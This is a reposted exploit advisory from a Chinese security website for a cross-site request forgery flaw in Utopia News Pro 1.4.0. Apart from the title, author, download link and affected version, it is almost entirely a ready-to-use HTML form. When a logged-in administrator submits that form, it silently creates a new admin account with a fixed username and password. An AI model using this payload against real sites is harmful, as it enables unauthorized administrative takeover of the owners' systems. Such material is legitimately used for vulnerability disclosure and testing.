首页 > 安全 > 网络安全 >

Utopia News Pro 1.4.0 <= CSRF 添加管理员账号

2012-04-09

标题: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability作者: Dr.NaNo下载地址: http://www.utopiasoftware.net/newspro/dl.php?filename=newspro140b.zip&mirror=1影响版本: 1.4.0测试平台:...

标题: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
作者: Dr.NaNo
下载地址: http://www.utopiasoftware.net/newspro/dl.php?filename=newspro140b.zip&mirror=1
影响版本: 1.4.0
测试平台: Linux-Red-Hat
测试方法
<html>
<body>
<form action="http:// www.2cto.com /{PATh}/upload/users.php" method="post" />
<input type="hidden" name="username" value="NANO" />
<input type="hidden" name="groupid" value="1" />
<input type="hidden" name="password" value="102030" />
<input type="hidden" name="password2" value="102030" />
<input type="hidden" name="email" value="security@security.com" />
<input type="submit" name="submitnew" accesskey="s" value="ThankS !" />
</form>
</body>
</html>
相关文章
最新文章
热点推荐